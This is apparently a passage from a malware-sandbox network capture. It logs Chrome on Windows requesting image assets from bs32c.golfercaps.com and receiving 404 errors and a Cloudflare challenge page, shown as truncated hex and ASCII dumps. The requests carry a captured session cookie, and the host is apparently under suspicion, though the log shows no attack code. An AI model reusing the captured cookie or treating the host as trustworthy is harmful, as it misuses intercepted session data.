                                                                  2024-12-30 21:42:43 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  66192.168.2.458527188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:43 UTC1445OUTGET /vfd23ced/assets/icon_radio_empty_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:45 UTC852INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:44 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCmgp3u2ZYkc3j9OOSjae9%2FTZ8HzIU%2FuIj%2Fl%2BqTPfhWNs9c6tOZqYxJQJ5vmx5Xw%2BKmkkJzkZQM6rB%2BeazGeVwCK3HozSlI8HqYJ9VeMVs4vk%2FoTV1rDA%2FWNFfxbhI6UtOaerRDKKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53388ed7c439d-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8794&min_rtt=1792&rtt_var=4994&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2045&delivery_rate=1629464&cwnd=201&unsent_bytes=0&cid=5963385999193e47&ts=1734&x=0"
                                                                  2024-12-30 21:42:45 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  67192.168.2.458528188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:43 UTC1452OUTGET /vfd23ced/assets/icon_check_not_checked_required.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:45 UTC839INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:44 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XfqDZSsVCwM7jz8Znt7fjGJKX6U9ltdpYVchgnYPFyR63s%2FEH2t75AFuIpXIpVqWqL4hRwV8LSVoF%2BdMcJjIhfWaOVrrfQLartkHEbcR6ZIXzvk9oxB9YuSIgXgdQnr2yPBmYCVN6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533894de90f98-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1481&rtt_var=584&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2052&delivery_rate=1830721&cwnd=182&unsent_bytes=0&cid=c697cf2b72d04a70&ts=1705&x=0"
                                                                  2024-12-30 21:42:45 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  68192.168.2.458529188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:43 UTC1460OUTGET /vfd23ced/assets/icon_check_not_checked_required_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:45 UTC843INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:45 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5eLhL%2F5%2BVSnrVVzS69WUF1U90W5XPCWdl7RvBnuvNW262JtmCBhzqGxVmU8e84cKMnyxMzKh7nj6ED01o7uKOm0VkM2rwnZ%2B0EDc796cdT%2FQml0f1sLw81e3WYXDvhLhBySs0EzssA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5338c1a928c5f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2047&rtt_var=776&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2060&delivery_rate=1403171&cwnd=171&unsent_bytes=0&cid=8ab81dd96b43e977&ts=1460&x=0"
                                                                  2024-12-30 21:42:45 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  69192.168.2.458531188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:44 UTC366OUTGET /vfd23ced/assets/bg.jpg HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:44 UTC1285INHTTP/1.1 403 Forbidden
                                                                  Date: Mon, 30 Dec 2024 21:42:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                  Origin-Agent-Cluster: ?1
                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  Referrer-Policy: same-origin
                                                                  X-Content-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  cf-mitigated: challenge
                                                                  2024-12-30 21:42:44 UTC916INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 79 62 38 39 63 58 53 4a 79 62 4b 47 64 74 76 78 57 32 5a 68 58 36 63 70 66 79 34 76 79 51 31 52 64 33 30 6d 5a 64 66 51 68 79 37 38 33 51 37 43 37 42 43 69 46 58 38 4b 56 5a 42 43 62 32 42 59 57 54 55 4d 38 61 41 38 77 6f 2f 42 77 51 36 6b 62 7a 64 78 77 33 4f 77 58 6c 2f 43 6f 4a 4b 75 42 38 39 61 68 66 4f 6e 65 33 51 3d 24 2b 64 64 6a 42 5a 63 30 62 56 47 69 66 32 31 53 49 79 55 6e 39 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                  Data Ascii: cf-chl-out: yb89cXSJybKGdtvxW2ZhX6cpfy4vyQ1Rd30mZdfQhy783Q7C7BCiFX8KVZBCb2BYWTUM8aA8wo/BwQ6kbzdxw3OwXl/CoJKuB89ahfOne3Q=$+ddjBZc0bVGif21SIyUn9A==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                  2024-12-30 21:42:44 UTC1369INData Raw: 32 32 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                  Data Ascii: 229a<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                  2024-12-30 21:42:44 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                  Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                  2024-12-30 21:42:44 UTC1369INData Raw: 78 6f 47 41 59 30 61 4b 42 48 78 76 56 63 58 2e 6b 61 59 72 5f 5a 6f 74 43 70 48 78 45 33 63 31 50 41 4e 41 38 50 66 43 30 7a 49 39 4f 65 6b 4f 62 4f 77 5a 35 34 54 4d 76 47 44 63 31 62 67 72 67 6b 72 68 49 50 44 6f 35 39 35 55 78 57 4f 49 52 76 4b 6b 6f 7a 47 4a 58 75 42 45 6e 61 5a 64 6e 5f 56 65 65 62 33 38 45 41 53 47 63 66 33 6e 6c 51 6b 32 68 31 47 33 32 51 67 59 77 46 45 54 6c 6d 6c 58 55 63 67 78 62 41 39 65 48 36 42 64 49 79 45 6a 6d 6d 5f 6d 36 75 43 71 65 35 67 57 48 37 4e 4a 34 41 59 44 34 74 77 41 48 4a 68 53 56 65 56 39 73 2e 4d 4e 79 37 68 68 56 63 43 38 51 36 58 6f 57 57 77 54 51 36 4a 74 5f 5f 58 75 7a 36 61 70 39 58 38 56 46 59 57 5a 4e 7a 38 5a 71 6f 39 6b 78 56 76 36 30 47 5f 4e 48 50 67 68 66 67 52 33 6b 43 38 55 79 53 63 72 42 74 56
                                                                  Data Ascii: xoGAY0aKBHxvVcX.kaYr_ZotCpHxE3c1PANA8PfC0zI9OekObOwZ54TMvGDc1bgrgkrhIPDo595UxWOIRvKkozGJXuBEnaZdn_Veeb38EASGcf3nlQk2h1G32QgYwFETlmlXUcgxbA9eH6BdIyEjmm_m6uCqe5gWH7NJ4AYD4twAHJhSVeV9s.MNy7hhVcC8Q6XoWWwTQ6Jt__Xuz6ap9X8VFYWZNz8Zqo9kxVv60G_NHPghfgR3kC8UyScrBtV
                                                                  2024-12-30 21:42:44 UTC1369INData Raw: 75 54 2e 48 4b 54 6d 52 39 72 37 51 39 4c 59 55 79 6b 63 55 53 35 36 78 76 5f 4b 68 75 64 6c 68 61 62 53 32 65 64 62 5a 33 77 5a 34 4f 37 64 75 31 62 46 56 38 36 4e 32 73 6d 7a 39 4a 2e 55 4a 6e 50 6a 65 52 6e 48 30 70 56 53 45 46 31 46 4e 32 4f 50 66 4c 79 6a 75 76 46 63 34 4c 31 5a 65 6a 2e 64 47 63 56 39 52 50 39 6d 68 58 76 71 48 7a 71 6a 41 74 39 4a 55 70 5f 56 44 7a 73 51 77 49 4c 42 48 65 51 57 50 74 71 4a 52 64 4a 65 74 30 4e 63 57 34 50 34 61 67 34 4b 73 6b 79 32 45 77 63 6c 42 75 65 2e 66 43 49 52 36 4b 30 39 41 4e 63 71 63 30 4a 46 64 42 6e 64 34 4f 4e 54 46 38 39 45 67 65 78 74 63 41 78 38 35 35 56 45 6f 6a 78 79 45 55 52 56 4d 62 6e 59 49 6f 6e 6c 77 42 4d 59 73 4b 31 57 46 67 32 4e 65 73 36 61 6b 34 6e 75 33 6a 62 41 41 48 4f 46 2e 73 65 57
                                                                  Data Ascii: uT.HKTmR9r7Q9LYUykcUS56xv_KhudlhabS2edbZ3wZ4O7du1bFV86N2smz9J.UJnPjeRnH0pVSEF1FN2OPfLyjuvFc4L1Zej.dGcV9RP9mhXvqHzqjAt9JUp_VDzsQwILBHeQWPtqJRdJet0NcW4P4ag4Ksky2EwclBue.fCIR6K09ANcqc0JFdBnd4ONTF89EgextcAx855VEojxyEURVMbnYIonlwBMYsK1WFg2Nes6ak4nu3jbAAHOF.seW
                                                                  2024-12-30 21:42:44 UTC1369INData Raw: 32 35 53 72 31 61 30 68 5f 37 38 5a 34 6d 4a 30 37 47 4d 4d 44 32 6a 4f 63 44 52 49 39 78 56 57 5f 66 70 49 6a 50 42 78 37 57 57 52 42 46 36 6a 31 49 76 6a 33 68 53 34 76 4b 68 58 79 58 76 58 6a 55 46 66 44 42 38 30 38 34 65 76 5f 78 55 69 2e 44 7a 6a 43 43 50 71 41 6e 46 5f 4e 49 4c 6e 70 58 6f 42 62 79 36 54 6c 57 36 79 39 4e 4b 62 6d 48 72 49 4a 4b 33 6b 49 56 55 77 69 74 41 41 42 75 72 6a 70 5f 6f 6d 4e 66 43 79 30 76 6a 33 65 45 6d 64 68 6b 55 48 6c 42 77 7a 66 30 61 38 70 6a 4b 62 33 69 5f 78 42 54 76 4f 57 54 77 70 49 59 51 68 65 73 42 50 6c 75 79 34 37 74 46 72 6d 48 63 78 36 47 56 6c 72 37 71 77 44 6b 53 41 70 77 6f 32 56 75 6c 79 47 4a 59 69 6d 55 74 6a 33 42 36 4f 46 68 35 6d 47 36 53 6d 72 53 45 37 54 2e 38 34 30 46 58 77 76 51 35 71 48 70 68
